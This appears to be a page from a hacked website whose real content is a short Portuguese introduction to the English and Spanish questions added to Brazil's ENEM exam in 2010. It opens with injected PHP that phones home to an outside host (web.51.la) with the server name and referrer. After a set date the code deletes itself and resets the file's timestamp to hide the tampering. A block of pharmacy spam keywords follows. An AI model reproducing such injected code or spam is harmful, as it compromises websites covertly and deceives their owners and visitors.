check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456733914){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776881&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_newsfeeds/models/models.php"); } Introdução da prova de língua estrangeira inglês (e espanhol) no ENEM cheap prednisone online endep discount vouchers erection packs 2 discount price retin a 0 05 discount janssen order weight loss after pregnancy cheap v gel medicine ventolin discount generic cheap advair diskus zoonosis cheap isoptin alternatives buy nolvadex and clomid online order pravachol reviews didronel discount vouchers buy viagra professional vs regular viagra order misoprostol cytotec chloromycetin discount coupon cheap viagra jelly radio ad order diamox back buy capoten sublingual order effexor xr indications buy singulair uk

Introdução da prova de língua estrangeira inglês (e espanhol) no ENEM

ImprimirE-mail

A reformulação do Exame Nacional do Ensino Médio-ENEM possibilitou o seu uso como forma de seleção para ingresso dos estudantes nas universidades. Os objetivos dessa reformulação são democratizar as oportunidades de acesso às universidades federais, possibilitar mobilidade acadêmica e induzir uma reestruturação dos currículos do ensino médo. Em 2010, o Exame conta pela primeira vez com questões de língua estrangeira – inglês e espanhol. O Edital do Exame publicado no site do INEP neste mesmo ano apresenta como objetivo das provas de línguas estrangeiras “conhecer e usar língua(s) estrangeira(s) moderna(s) como instrumento de acesso a informações e a outras culturas e grupos sociais”, o que implica tanto em aprender sobre fatos da língua-alvo como aprender a usar a língua-alvo.